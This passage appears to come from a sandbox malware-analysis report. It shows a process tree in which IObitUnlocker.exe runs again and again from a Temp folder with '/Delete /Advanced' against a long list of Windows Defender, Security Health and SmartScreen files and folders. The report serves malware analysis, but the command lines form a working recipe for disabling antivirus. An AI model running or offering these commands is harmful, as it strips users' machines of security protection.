Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 